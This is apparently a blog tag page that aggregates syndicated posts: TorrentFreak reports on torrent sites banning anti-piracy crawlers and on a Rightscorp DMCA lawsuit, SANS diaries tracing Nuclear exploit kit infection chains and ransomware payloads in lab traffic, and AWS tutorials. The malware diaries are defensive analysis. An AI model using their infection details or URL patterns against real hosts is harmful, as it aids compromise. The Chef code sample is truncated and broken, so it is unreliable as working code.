Posts tagged ‘ip address’

TorrentFreak: Anti-Piracy Activities Get VPNs Banned at Torrent Sites

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

For the privacy-conscious Internet user, VPNs and similar services are now considered must-have tools. In addition to providing much-needed security, VPNs also allow users to side-step geo-blocking technology, a useful ability for today’s global web-trotter.

While VPNs are often associated with file-sharing activity, it may be of interest to learn that they are also used by groups looking to crack down on the practice. Just like file-sharers it appears that anti-piracy groups prefer to work undetected, as events during the past few days have shown.

Earlier this week while doing our usual sweep of the world’s leading torrent sites, it became evident that at least two popular portals were refusing to load. Finding no complaints that the sites were down, we were able to access them via publicly accessible proxies and as a result thought no more of it.

A day later, however, comments began to surface on Twitter that some VPN users were having problems accessing certain torrent sites. Sure enough, after we disabled our VPN the affected sites sprang into action. Shortly after, reader emails to TF revealed that other users were experiencing similar problems.

Eager to learn more, TF opened up a dialog with one of the affected sites and in return for granting complete anonymity, its operator agreed to tell us what had been happening.

“The IP range you mentioned was used for massive DMCA crawling and thus it’s been blocked,” the admin told us.

Intrigued, we asked the operator more questions. How do DMCA crawlers manifest themselves? Are they easy to spot and deal with?

“If you see 15,000 requests from the same IP address after integrity checks on the IP’s browsers for the day, you can safely assume it’s a [DMCA] bot,” the admin said.

From the above we now know that anti-piracy bots use commercial VPN services, but do they also access the sites by other means?

“They mostly use rented dedicated servers. But sometimes I’ve even caught them using Hola VPN,” our source adds. Interestingly, it appears that the anti-piracy activities were directed through the IP addresses of Hola users without them knowing.

Once spotted, the IP addresses used by the aggressive bots are banned. The site admin wouldn’t tell TF how his system works. However, he did disclose that sizable computing resources are deployed to deal with the issue and that the intelligence gathered proves extremely useful.
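As a rough illustration of the kind of volume check the admin describes, the sketch below tallies requests per client IP from a day’s worth of web server logs and flags anything above the quoted threshold. The log format, the file name, and the use of a plain counter are assumptions for the example, not details of any site’s actual system.

from collections import Counter

DAILY_THRESHOLD = 15000  # requests per IP per day, per the admin's rule of thumb

def suspected_bots(log_lines):
    """Count requests per client IP and return addresses above the threshold.

    Assumes combined-log-style lines where the client IP is the first field.
    """
    hits = Counter(line.split(" ", 1)[0] for line in log_lines if line.strip())
    return {ip: count for ip, count in hits.items() if count >= DAILY_THRESHOLD}

with open("access.log") as handle:  # hypothetical log file
    for ip, count in sorted(suspected_bots(handle).items(), key=lambda x: -x[1]):
        print(f"{ip} made {count} requests today - candidate for closer inspection")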

Of course, just because an IP address is banned at a torrent site it doesn’t necessarily follow that a similar anti-DMCA system is being deployed. IP addresses are often excluded after being linked to users uploading spam, fakes and malware. Additionally, users can share IP addresses, particularly in the case of VPNs. Nevertheless, the banning of DMCA notice-senders is a documented phenomenon.

Earlier this month Jonathan Bailey at Plagiarism Today revealed his frustrations when attempting to get so-called “revenge porn” removed from various sites.

“Once you file your copyright or other notice of abuse, the host, rather than remove the material at question, simply blocks you, the submitter, from accessing the site,” Bailey explains.

“This is most commonly done by blocking your IP address. This means, when you come back to check and see if the site’s content is down, it appears that the content, and maybe the entire site, is offline. However, in reality, the rest of the world can view the content, it’s just you that can’t see it,” he notes.

Perhaps unsurprisingly, Bailey advises a simple way of regaining access to a site using these methods.

“I keep subscriptions with multiple VPN providers that give access to over a hundred potential IP addresses that I can use to get around such tactics,” he reveals.

The good news for both file-sharers and anti-piracy groups alike is that IP address blocks like these don’t last forever. The site we spoke with said that blocks on the VPN range we inquired about had already been removed. Still, the cat and mouse game is likely to continue.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

SANS Internet Storm Center, InfoCON: green: BizCN gate actor update, (Fri, Oct 2nd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green


The actor using gates registered through BizCN (always with privacy protection) continues using the Nuclear exploit kit (EK) to deliver malware.

My previous diary on this actor documented the actor’s switch from Fiesta EK to Nuclear EK in early July 2015 [1]. Since then, the BizCN gate actor briefly switched to Neutrino EK; however, it appears to be using Nuclear EK again.

Our thanks to Paul, who submitted a pcap of traffic from this actor to the ISC.


Paul’s pcap showed us a Google search leading to the compromised website. In the image below, you can also see the HTTP requests that followed.
Shown above: A pcap of the traffic filtered by HTTP request.

No payload was found in this EK traffic, so the Windows host viewing the compromised website didn’t get infected. The Windows host from this pcap was running IE 11, and URLs for the EK traffic stop after the last two HTTP POST requests. These URL patterns are what I’ve seen every time IE 11 crashes after getting hit with Nuclear EK.

A key thing to remember with the BizCN gate actor is the referer line from the landing page. This will always show the compromised website, and it won’t indicate the BizCN-registered gate that gets you there. Paul’s pcap didn’t include traffic to the BizCN-registered gate, but I found a reference to it in the traffic.
Shown above: Flow chart for EK traffic associated with the BizCN gate actor.

How did I find the gate in this example? First, I checked the referer on the HTTP GET request to the EK landing page.
Shown above: TCP stream for the HTTP GET request to the Nuclear EK landing page.

That referer should have injected script pointing to the BizCN gate URL, so I exported that page from the pcap.
Shown above: The object I exported from the pcap.

I searched the HTML text and found the malicious script pointing to the BizCN-registered gate.
Shown above: Malicious script in the page from the compromised website pointing to a URL on the BizCN-registered gate domain.
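To reproduce that last step, once the page has been exported from the pcap, a quick pass over the HTML for script tags that load content from another domain is usually enough. The sketch below is a generic illustration, not the handler’s actual tooling; the file name and the compromised site’s domain are placeholders.

import re

PAGE_FILE = "exported_page.html"           # hypothetical: the object exported from the pcap
SITE_DOMAIN = "compromised-site.example"   # hypothetical: the compromised site's own domain

# Script tags whose src points somewhere other than the site hosting the page
# are good candidates for injected gate URLs.
script_src = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.IGNORECASE)

with open(PAGE_FILE, encoding="utf-8", errors="replace") as handle:
    html = handle.read()

for url in script_src.findall(html):
    if SITE_DOMAIN not in url:
        print("possible injected script ->", url)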

The BizCN-registered gate domain was registered with privacy protection, and pinging it showed the IP address it resolves to.
Shown above: Whois information on the BizCN-registered gate domain.

This completes my flow chart for the BizCN gate actor. The domains associated with Paul’s pcap were:

  • – Compromised website
  • – – BizCN-registered gate
  • – – Nuclear EK

Final words

Recently, I’ve had a hard time getting a full chain of infection traffic from the BizCN gate actor. Paul’s pcap also had this issue, because there was no payload. However, the BizCN gate actor is still active, and many of the compromised websites I’ve noted in previous diaries [1, 4] are still compromised.

We continue to track the BizCN gate actor, and we’ll let you know if we discover any significant changes.

Brad Duncan
Security Researcher at Rackspace
Blog: – Twitter: @malware_traffic



(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Comcast User Hit With 112 DMCA Notices in 48 Hours

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Every day, DMCA-style notices are sent to regular Internet users who use BitTorrent to share copyrighted material. These notices are delivered to users’ Internet service providers who pass them on in the hope that customers correct their behavior.

The most well-known notice system in operation in the United States is the so-called “six strikes” scheme, in which the leading recording labels and movie studios send educational warning notices to presumed pirates. Not surprisingly, six-strikes refers to users receiving a maximum of six notices. However, content providers outside the scheme are not bound by its rules – sometimes to the extreme.

According to a lawsuit filed this week in the United States District Court for the Western District of Pennsylvania (pdf), one unlucky Comcast user was subjected not only to a barrage of copyright notices on an unprecedented scale, but during one of the narrowest time frames yet.

The complaint comes from Rotten Records who state that the account holder behind a single Comcast IP address used BitTorrent to share the discography of Dog Fashion Disco, a long-since defunct metal band previously known as Hug the Retard.

“Defendant distributed all of the pieces of the Infringing Files allowing others to assemble them into a playable audio file,” Rotten Records’ attorney Flynn Wirkus Young explains.

Considering Rotten Records have been working with Rightscorp on other cases this year, it will come as no surprise that the anti-piracy outfit is also involved in this one. And boy have they been busy tracking this particular user. In a single 48 hour period, Rightscorp hammered the Comcast subscriber with more than two DMCA notices every hour over a single torrent.

“Rightscorp sent Defendant 112 notices via Defendant’s ISP Comcast from June 15, 2015 to June 17, 2015 demanding that Defendant stop illegally distributing Plaintiff’s work,” the lawsuit reads.

“Defendant ignored each and every notice and continued to illegally distribute Plaintiff’s work.”


While it’s clear that the John Doe behind the IP address shouldn’t have been sharing the works in question (if he indeed was the culprit and not someone else), the suggestion to the Court that he or she systematically ignored 112 demands to stop infringing copyright is stretching the bounds of reasonable, to say the least.

In fact, Court documents state that after infringement began sometime on June 15, the latest infringement took place on June 16 at 11:49am, meaning that the defendant may well have acted on Rightscorp’s notices within 24 hours – and that’s presuming that Comcast passed them on right away, or even at all.

Either way, the attempt here is to portray the defendant as someone who had zero respect for Rotten Records’ rights, even after being warned by Rightscorp more than a hundred and ten times. Trouble is, all of those notices covered an alleged infringing period of less than 36 hours – hardly a reasonable time in which to react.

Still, it’s unlikely the Court will be particularly interested and will probably issue an order for Comcast to hand over their subscriber’s identity so he or she can be targeted by Rotten Records for a cash settlement.

Rotten has targeted Comcast users on several earlier occasions, despite being able to sue the subscribers of any service provider. Notably, while Comcast does indeed pass on Rightscorp’s DMCA takedown notices, it strips the cash settlement demand from the bottom.

One has to wonder whether Rightscorp and its client are trying to send the ISP a message with these lawsuits.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

SANS Internet Storm Center, InfoCON: green: Recent trends in Nuclear Exploit Kit activity, (Thu, Oct 1st)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green


Since mid-September 2015, I’ve generated a great deal of Nuclear exploit kit (EK) traffic after checking compromised websites. This summer, I usually found Angler EK. Now I’m seeing more Nuclear.

Nuclear EK has also been sending dual payloads. I documented dual payloads at least three times last year [1, 2, 3], but I hadn’t noticed it again from Nuclear EK until recently. This time, one of the payloads appears to be ransomware. I saw Filecoder on 2015-09-18 [4] and TeslaCrypt 2.0 on 2015-09-29 [5]. In both cases, ransomware was a component of the dual payloads from Nuclear EK.

To be clear, Nuclear EK isn’t always sending two payloads, but I’ve noticed a dual payload trend with this recent increase in Nuclear EK traffic.

Furthermore, on Wednesday 2015-09-30, the URL pattern for Nuclear EK’s landing page changed. With that in mind, let’s take a look at what’s happening with Nuclear.

URL patterns

The images below show some examples of URL patterns for Nuclear EK from mid-to-late September 2015.

Shown above: Some URLs from Nuclear EK on 2015-09-15.
Shown above: Some URLs from Nuclear EK on 2015-09-16.
Shown above: Some URLs from Nuclear EK on 2015-09-18.
Shown above: Some URLs from Nuclear EK on 2015-09-22.
Shown above: Some URLs from Nuclear EK on 2015-09-29.

In the above images, the initial HTTP GET request always starts with /search?q= for the landing page URL.

Shown above: Some URLs from Nuclear EK on 2015-09-30.

The initial HTTP GET request now starts with /url?sa= instead of /search?q= for the landing page URL. I saw the same thing from three different examples of Nuclear EK on 2015-09-30. Windows hosts from these examples all had the exact same URL patterns.
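Both of those paths mimic Google URLs: /search?q= is Google’s search path and /url?sa= is its redirect path, and neither should normally be requested from a non-Google host. A minimal sketch of sweeping a list of proxied URLs for that mismatch is shown below; the input file and the simple host check are assumptions for the example, not part of this diary.

from urllib.parse import urlsplit

def looks_like_fake_google(url):
    """Flag Google-style search/redirect URLs that are not on a Google host."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    is_google = host == "google.com" or host.endswith(".google.com")
    path_hit = parts.path in ("/search", "/url")
    query_hit = parts.query.startswith(("q=", "sa="))
    return path_hit and query_hit and not is_google

# hypothetical proxy log export with one full URL per line
with open("proxy_urls.txt") as handle:
    for line in handle:
        url = line.strip()
        if url and looks_like_fake_google(url):
            print("possible EK landing page:", url)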

Nuclear EK examples from 2015-09-30

I had some trouble infecting a Windows 7 host running IE 11. The browser always crashed before the EK payload was sent. So I tried three different configurations to generate traffic for this diary. The first run had a Windows 7 host running IE 10. The second run had a Windows 7 host running IE 8. The third run had a Windows 7 host running IE 11. All hosts were also running Flash player. I found a compromised website with an injected iframe leading to Nuclear EK. The screenshot below shows an example of the malicious script at the bottom of the page. It’s right before the closing body and HTML tags.
Shown above: Malicious script at the bottom of a page from the compromised website.

The first run used IE 10 with Flash player. This run ended with a ransomware infection that changed the desktop background, as shown below.
Shown above: Desktop background from the infected host.

Decrypt instructions were left as a text file on the desktop. The authors behind this ransomware provided two email addresses for further decryption instructions.
Shown above: Decryption instructions from the ransomware.

Playing around with the pcap in Wireshark, I got a decent representation of the traffic. Below, you’ll see the compromised website, the Nuclear EK traffic, and some of the post-infection traffic. TLS activity on ports 443 and 9001 with random characters for the server names is Tor traffic. Several other attempted TCP connections can be found in the pcap, but none of those were successful, and they’re not shown below.
Shown above: Some of the infection traffic from the pcap in Wireshark (from a Windows host using IE 10 and Flash player).

Below are alerts on the infection traffic when I used tcpreplay on Security Onion with the Emerging Threats (ET) and ET Pro rule sets.

Shown above: Alerts from the traffic using Sguil in Security Onion.

For the second run, I infected a different Windows host running IE 8 and Flash player. This generated Nuclear EK from the same IP address and a slightly different domain name; however, I didn’t see the same traffic that had triggered alerts during the first run.
Shown above: Nuclear EK traffic using IE 8 and Flash player.

For the third run, I used a Windows host with IE 11 and Flash player. As mentioned earlier, the browser would crash before the EK sent the payload, so this host didn’t get infected with malware. I tried it once with Flash player and once without Flash player, both times running an unpatched version of IE 11. Each time, the browser crashed. Nuclear EK was still using the same IP address, but the domain names were different. Within a 4-minute timespan in the pcap, you’ll find both attempts, shown below.
Shown above: Nuclear EK traffic using IE 11 and Flash player (tried twice, but the browser crashed each time).
Shown above: Nuclear EK sends the first malware payload.
Shown above: Nuclear EK sends the second malware payload.

Other than the landing page URL pattern and the dual payload, Nuclear EK looks remarkably similar to the last time we reviewed it in August 2015 [6].

Preliminary malware analysis

The first and second runs generated a full infection chain and post-infection traffic. The malware payload was the same during the first and second run. The first run had additional malware on the infected host. The third run using IE 11 didn’t generate any malware payload.

Nuclear EK malware payload 1 of 2:

AWS Official Blog: New – Receive and Process Incoming Email with Amazon SES

This post was syndicated from: AWS Official Blog and was written by: Jeff Barr. Original post: at AWS Official Blog

We launched the Amazon Simple Email Service (SES) way back in 2011, with a focus on deliverability — getting mail through to the intended recipients. Today, the service is used by Amazon and our customers to send billions of transactional and marketing emails each year.

Today we are launching a much-requested new feature for SES. You can now use SES to receive email messages for entire domains or for individual addresses within a domain. This will allow you to build scalable, highly automated systems that can programmatically send, receive, and process messages with minimal human intervention.

You use sophisticated rule sets and IP address filters to control the destiny of each message. Messages that match a rule can be augmented with additional headers, stored in an S3 bucket, routed to an SNS topic, passed to a Lambda function, or bounced.

Receiving and Processing Email
In order to make use of this feature you will need to verify that you own the domain of interest. If you have already done this in order to use SES to send email, then you are already good to go.

Now you need to route your incoming email to SES for processing. You have two options here. You can set the domain’s MX (Mail Exchange) record to point to the SES SMTP endpoint in the region where you want to process incoming email. Or, you can configure your existing mail handling system to forward mail to the endpoint.
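Purely as an illustration (not part of the original announcement), pointing a Route 53-hosted domain at the region’s SES inbound endpoint could be scripted like this; the domain and hosted zone ID are placeholders, and us-east-1 is just an example region.

import boto3

route53 = boto3.client("route53")

# Point the domain's MX record at the SES inbound SMTP endpoint for the region
# where incoming mail should be processed.
route53.change_resource_record_sets(
    HostedZoneId="Z1EXAMPLE",            # placeholder hosted zone ID
    ChangeBatch={
        "Comment": "Route incoming mail to Amazon SES",
        "Changes": [{
            "Action": "UPSERT",
            "ResourceRecordSet": {
                "Name": "example.com.",  # placeholder domain
                "Type": "MX",
                "TTL": 300,
                "ResourceRecords": [{"Value": "10 inbound-smtp.us-east-1.amazonaws.com"}],
            },
        }],
    },
)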

The next step is to figure out what you want to do with the messages. To do this, you need to create some receipt rules. Rules are grouped into rule sets (order matters within the set) and can apply to multiple domains. Like most aspects of AWS, rules and rule sets are specific to a particular region. You can have one active rule set per AWS region; if you have no such set, then all incoming email will be rejected.

Rules have the following attributes (a short scripted sketch using them follows the list):

  • Enabled – A flag that enables or disables the rule.
  • Recipients – A list of email addresses and/or domains that the rule applies to. If this attribute is not supplied, the rule matches all addresses in the domain.
  • Scan – A flag to request spam and virus scans (default is true).
  • TLS – A flag to require that mail matching this rule is delivered over a connection that is encrypted with TLS.
  • Action List – An ordered list of actions to perform on messages that match the rule.
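As a sketch of how a rule with these attributes could be created outside the console (the rule set name, address, bucket, and topic ARN below are placeholders, not values from this post):

import boto3

ses = boto3.client("ses", region_name="us-east-1")  # example region

# One-time setup: create a rule set and make it the active one for the region.
ses.create_receipt_rule_set(RuleSetName="my-rule-set")
ses.set_active_receipt_rule_set(RuleSetName="my-rule-set")

# A rule that scans mail for one address, stores it in S3, then notifies SNS.
ses.create_receipt_rule(
    RuleSetName="my-rule-set",
    Rule={
        "Name": "store-and-notify",
        "Enabled": True,
        "TlsPolicy": "Optional",             # "Require" enforces TLS delivery
        "ScanEnabled": True,                 # spam and virus scanning
        "Recipients": ["info@example.com"],  # omit to match the whole domain
        "Actions": [
            {"S3Action": {"BucketName": "my-incoming-mail-bucket"}},
            {"SNSAction": {"TopicArn": "arn:aws:sns:us-east-1:123456789012:MyTopic"}},
        ],
    },
)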

When SES receives a message, it performs several checks before it accepts the message for further processing. Here’s what happens:

  • The source IP address is checked against an internal block list maintained by SES, and the message is rejected if the address appears on that list (the list can be overridden using an IP address filter that explicitly allows the IP address).
  • The source IP address is checked against your IP address filters, and the message is rejected if so directed by a filter.
  • The message is checked to see if it matches any of the recipients specified in a rule, or if there is a domain-level match, and it is accepted if so.

Messages that do not match a rule do not cost you anything. After a message has been accepted, SES will perform the actions associated with the matching rule.  The following actions are available:

  • Add a header to the message.
  • Store the message in a designated S3 bucket, with optional encryption using a key stored in AWS Key Management Service (KMS). The entire message (headers and body) must be no larger than 30 megabytes in size for this action to be effective.
  • Publish the message to a designated SNS topic. The entire message (headers and body) must be no larger than 150 kilobytes in size for this action to be effective.
  • Invoke a Lambda function. The invocation can be synchronous or asynchronous (the default).
  • Return a specified bounce message to the sender.
  • Stop processing the actions in the rule.

The actions are run in the order specified by the rule. Lambda actions have access to the results of the spam and virus scans and can take action accordingly. If the Lambda function needs access to the body of the message, a preceding action in the rule must store the message in S3.

A Quick Demo
Here’s how I would create a rule that passes incoming email messages to a Lambda function (MyFunction), notifies an SNS topic (MyTopic), and then stores the messages in an S3 bucket (MyBucket) after encrypting them with a KMS key (aws/ses):

I can see all of my rules at a glance:

Here’s a Lambda function that will stop further processing if a message fails any of the spam or virus checks. In order for this function to perform as expected, it must be invoked in synchronous (RequestResponse) fashion.

exports.handler = function(event, context) {
    console.log('Spam filter');
    var sesNotification = event.Records[0].ses;
    console.log("SES Notification:\n", JSON.stringify(sesNotification, null, 2));

    // Check if any spam, virus, or authentication check failed
    if (sesNotification.receipt.spfVerdict.status      === 'FAIL'
        || sesNotification.receipt.dkimVerdict.status  === 'FAIL'
        || sesNotification.receipt.spamVerdict.status  === 'FAIL'
        || sesNotification.receipt.virusVerdict.status === 'FAIL') {
        console.log('Dropping spam');
        // Stop processing the rule set, dropping the message
        context.done(null, {'disposition': 'STOP_RULE_SET'});
    } else {
        context.done(null, null);
    }
};

To learn more about this feature, read Receiving Email in the Amazon SES Developer Guide.

Pricing and Availability
You will pay $0.10 for every 1000 emails that you receive. Messages that are 256 KB or larger are charged for the number of complete 256 KB chunks in the message, at the rate of $0.09 per 1000 chunks. A 768 KB message counts for 3 chunks. You’ll also pay for any S3, SNS, or Lambda resources that you consume. Refer to the Amazon SES Pricing page for more information.

This new feature is available now and you can start using it today. Amazon SES is available in the US East (Northern Virginia), US West (Oregon), and Europe (Ireland) regions.

— Jeff;

AWS Security Blog: Use AWS Services to Comply with Security Best Practices—Minus the Inordinate Time Investment

This post was syndicated from: AWS Security Blog and was written by: Jonathan Desrocher. Original post: at AWS Security Blog

As security professionals, it is our job to be sure that our decisions comply with best practices. Best practices, though, tend to be time consuming, which means we either don’t get around to following best practices, or we spend too much time on tedious, manual tasks. This blog post includes two examples where AWS services can help achieve compliance with security best practices, minus the inordinate time investment.

One AWS Identity and Access Management (IAM) best practice is to delete or regularly rotate access keys. However, knowing which AWS access keys are in use has usually involved poring over AWS CloudTrail logs. In my May 30 webinar, I highlighted the then recently launched access key last used feature that makes access key rotation easier. By knowing the date and IP address of the last usage, you can much more easily identify which keys are in use and where. You can also identify those keys that haven’t been used in a long time; this helps to maintain good security posture by retiring and deleting old, unused access keys.

If you have a Windows environment on AWS and need to join each Amazon EC2 instance to the Windows domain, you typically have to either do it manually or embed credentials in the Amazon Machine Image (AMI). In this Auto Scaling Lifecycle Policies for Security Practitioners video, I show you how you can use Auto Scaling lifecycle policies to, among other things, join a server to a Windows domain without sharing credentials across instances.

These are just two examples of how using AWS services helps you comply with best practices, reduce risk, and spend less time on manual tasks. If you have questions or comments, either post them below or go to the IAM forum.

– Jonathan

Application Management Blog: Using AWS OpsWorks to Customize and Automate App Deployment on Windows

This post was syndicated from: Application Management Blog and was written by: Daniel Huesch. Original post: at Application Management Blog

Using OpsWorks and Chef on Windows helps you optimize your use of Windows by reliably automating configuration tasks to enforce instance compliance. Automating instance configuration enables software engineering best practices, like code-reviews and continuous integration, and allows smaller, faster delivery than with manual configuration. With automated instance configuration, you depend less on golden images or manual changes. OpsWorks also ships with features that ease operational tasks, like user management or scaling your infrastructure by booting additional machines.

In this post, I show how you can use OpsWorks to customize your instances and deploy your apps on Windows. To show how easy application management is when using OpsWorks, we will deploy a Node.JS app to Microsoft Internet Information Server (IIS). You can find both the cookbooks and the app source code in the Amazon Web Services – Labs repository on GitHub.

To follow this example, you need to understand how OpsWorks uses recipes and lifecycle events. For more information, see What is AWS OpsWorks?.

Create the Stack and Instance

First, let’s create a stack in the OpsWorks console by navigating to the Add Stack page.

For the name, type Node.JS Windows Demo. For the Default operating system, choose Microsoft Windows Server 2012 R2 Base.

Next, configure the cookbook source. Choose Advanced to display the Configuration Management section. Enable Use custom Chef cookbooks, choose the Git version control system as the Repository type, and enter the Git URL of the example cookbooks repository as the Repository URL. The cookbooks that we just configured describe how a Node.JS app is installed.

Choose Add Stack to create the stack.
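If you prefer scripting to clicking, the same stack can be created through the OpsWorks API. The sketch below is not part of the original walkthrough; the role and instance profile ARNs are placeholders, and the cookbook URL is whatever you would otherwise paste into the console.

import boto3

opsworks = boto3.client("opsworks", region_name="us-east-1")  # example region

stack = opsworks.create_stack(
    Name="Node.JS Windows Demo",
    Region="us-east-1",
    ServiceRoleArn="arn:aws:iam::123456789012:role/aws-opsworks-service-role",                     # placeholder
    DefaultInstanceProfileArn="arn:aws:iam::123456789012:instance-profile/aws-opsworks-ec2-role",  # placeholder
    DefaultOs="Microsoft Windows Server 2012 R2 Base",
    ConfigurationManager={"Name": "Chef", "Version": "12.2"},  # Chef 12 for Windows stacks
    UseCustomCookbooks=True,
    CustomCookbooksSource={
        "Type": "git",
        "Url": "<git URL of the example cookbooks repository>",  # same URL as entered in the console
    },
)
print("Created stack", stack["StackId"])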

In the Layers section, choose Add a Layer. Choose any name and short name you like. For Security Groups, choose AWS-OpsWorks-Web-Server as an additional security group. This ensures that HTTP traffic is allowed and you can connect to the demo app with your browser. For this example, you don’t need RDP access, so you can safely ignore the warning. Choose Add Layer.

Before we add instances to this layer, we have to wire up the Chef code with the lifecycle events. To do that, edit the layer’s recipes: on the Layers page, choose Recipes for the layer, and then choose Edit. For the Setup lifecycle event, choose webserver_nodejs::setup, and for the Deploy event, choose webserver_nodejs::deploy.

Confirm your changes by choosing Save.

Now we are ready to add an instance. Switch to the Instances page by choosing Instances, and then choose Add an Instance. OpsWorks suggests a Hostname based on the layer name; for this example, webserver-node1. Choose Add Instance to confirm.

Don’t start the instance yet. We need to tell OpsWorks about the app that we want to deploy first. This ensures that the app is deployed when the instance starts. (When an instance executes the Setup event during boot, OpsWorks deploys apps automatically. Later, you can deploy new and existing apps to any running instances.)

Create the App

In the left pane, choose Apps to switch to the Apps page, and then choose Add an app. Give the app a name, choose Git as the Repository type, and enter the demo app’s Git URL as the Repository URL. The demo app supports environment variables, so you can use the APP_ADMIN_EMAIL key to set the mail address displayed on the demo app’s front page. Use any value you like.

To save the app, choose Add App. Return to the Instances page. Now start the instance.

OpsWorks reports setup progress, switching from “requested” to “pending,” and then to “booting.” When the instance is “booting,” it is running on Amazon EC2. After the OpsWorks agent is installed and has picked up its first lifecycle event, the status changes to “running_setup.” After OpsWorks processes the Setup lifecycle event, it shows the instance as “online.” When an instance reaches the online state, OpsWorks fires a Configure lifecycle event to inform all instances in the stack about the new instance.

Booting a new instance can take a few minutes, the total time depending on the instance size and your Chef recipes. While you wait, get a cup of coffee or tea. Then, let’s take a look at the code that Chef will execute and the general structure of the opsworks-windows-example-cookbooks.

Cookbook Deep Dive – Setup Event

Let’s take a look at the webserver_nodejs::setup recipe, which we wired to the Setup event when we chose layer settings:

# Recipes to install software on initial boot

include_recipe "opsworks_iis"
include_recipe "opsworks_nodejs"
include_recipe "opsworks_iisnode"

This recipe simply includes other recipes. As you can see, Chef installs IIS, Node.JS, and the IIS-to-Node.JS bridge iisnode. By taking a closer look at the opsworks_nodejs cookbook, we can learn how to install apps. The general folder structure of a Chef cookbook is:

├── attributes
│   └── default.rb
├── definitions
│   └── opsworks_nodejs_npm.rb
├── metadata.rb
└── recipes
    └── default.rb

The opsworks_nodejs cookbook uses attributes to define settings that you can override when using the cookbook. This makes it easy to update to a new version of Node.JS or npm, the node package manager, by just setting the attribute to another value.

The file opsworks_nodejs/attributes/default.rb defines these version attributes:

default["opsworks_nodejs"]["node_version"] = "0.12.7"
default["opsworks_nodejs"]["npm_version"] = "2.13.0"

The default recipe in the opsworks_nodejs cookbook uses the node_version and npm_version. It uses node_version as part of the download URL construction and npm_version in the batch code.

version = node["opsworks_nodejs"]["node_version"]

download_file = "node-v#{version}-x86.msi"
download_path = ::File.join(Chef::Config["file_cache_path"], download_file)

remote_file download_path do
  source "{version}/#{download_file}"
  retries 2

windows_package "nodejs" do
  source download_path

batch "install npm version #{node['opsworks_nodejs']['npm_version']}" do
  code ""%programfiles(x86)%\nodejs\npm" -g install npm@#{node['opsworks_nodejs']['npm_version']}"

The cookbook installs Node.JS in two steps. First, it uses the Chef remote_file resource to download the installation package from the official Node.JS website and save it to the local disk. The cookbook also sets the retries attribute to enable retries, so the code is more resilient to short-term networking issues.

After the cookbook saves the file, the windows_package resource installs the MSI. Then, the cookbook installs the requested npm version using the batch resource.

Chef resources provide many attributes for fine-tuning their behavior. For more information, see the Chef Resources Reference.

Cookbook Deep Dive – Deploy Event

As I mentioned, OpsWorks doesn’t prepopulate your Chef run with recipes or resources. This gives you fine-grained control and complete flexibility over how to deploy your app. However, there are some common tasks, like checking your app out of Git or downloading it from Amazon S3. To make performing common tasks easier, the example cookbooks ship with a custom Chef resource that handles these steps for you, opsworks_scm_checkout.

As it does with the Setup recipe, OpsWorks uses the webserver_nodejs::deploy recipe only to include other recipes. The opsworks_app_nodejs cookbook’s default recipe does the heavy lifting.

The slimmed-down version of the recipe looks like the following.

apps = search(:aws_opsworks_app, "deploy:true")

apps.each do |app|
  opsworks_scm_checkout app["shortname"] do
    # ...
  end

  directory app_deploy do
    # ...
  end

  # Copy app to deployment directory
  batch "copy #{app["shortname"]}" do
    code "Robocopy.exe ..."
  end

  # Run 'npm install'
  opsworks_nodejs_npm app["shortname"] do
    cwd app_deploy
  end

  template "#{app['shortname']}/web.config" do
    variables({ :environment => app["environment"] })
  end

  powershell_script "register #{app["shortname"]}" do
    # ...
  end
end
Reviewing the code will help you understand how to write your own deployment cookbooks, so let’s walk through it. First, we use Chef search to fetch information about the apps to be deployed. The AWS OpsWorks User Guide lists all exposed attributes.

For each app, Chef then executes the following steps:

  • It checks out the app to the local file system using the opsworks_scm_checkout resource.
  • It creates the target directory and copies the app to that directory. To transfer only the files that have changed, it uses Robocopy.
  • Running npm install, it downloads all required third-party libraries. It does this by using the opsworks_nodejs_npm custom resource, which is defined in the opsworks_nodejs cookbook.
  • The web.config file is generated using a template, taking OpsWorks environment variables into account. The file configures the IIS-to-Node.JS integration.
  • A Windows PowerShell run registers the IIS site and brings the app online.

Check Out the Node.JS Demo App

Your booted instance should be online now:

To access the demo app, under Public IP, click the IP address. The app allows you to leave comments that other visitors can see.

Notice that the page is not static, but includes information about the hostname, the browser you used to request it, the system time, and the Node.JS version used. At the bottom of the page, you can see that the APP_ADMIN_EMAIL environment variable you configured in the app was picked up.

Leave a comment on the app, and choose Send. Because this is a minimal app for demo purposes only, the comment is saved on the instance in a plain JSON file.

To see the details of the customizations OpsWorks just applied to your instance, choose the hostname on the Layer overview page. On the very bottom of the Instance detail page, you will find the last 30 commands the instance received. To see the corresponding Chef log, choose show.


Using OpsWorks with Chef 12 on Windows gives you a reliable framework for customizing your Windows Server 2012 R2 instances and managing your apps. By attaching Chef recipes to lifecycle events, you can customize your instances. You can use open source community cookbooks or create your own cookbooks. Chef’s support for PowerShell allows you to reuse automation for Windows. OpsWorks’ built-in operational tools, like user management, permissions, and temporary RDP access help you manage day-to-day operations.

The example showed how to deploy a Node.JS app using IIS. By referring to typical cookbooks that were included in the example like opsworks_nodejs, which is used to install Node.JS, or opsworks_app_nodejs, which is used to deploy the app, you can learn how to write your own cookbooks.

SANS Internet Storm Center, InfoCON: green: The WordPress Plugins Playground, (Mon, Sep 14th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This morning, I had a quick look at my web server log file and searched for malicious activity. Attacks like brute force generate a lot of entries and thus can be easily detected. Other scanners work below the radar and search for very specific vulnerabilities. In this case, a single request is often sent to the server and generates a simple 404 error without triggering any alert. My blog being based on the WordPress CMS, I searched for non-HTTP/200 hits for plugin URLs (/wp-content/plugins/).

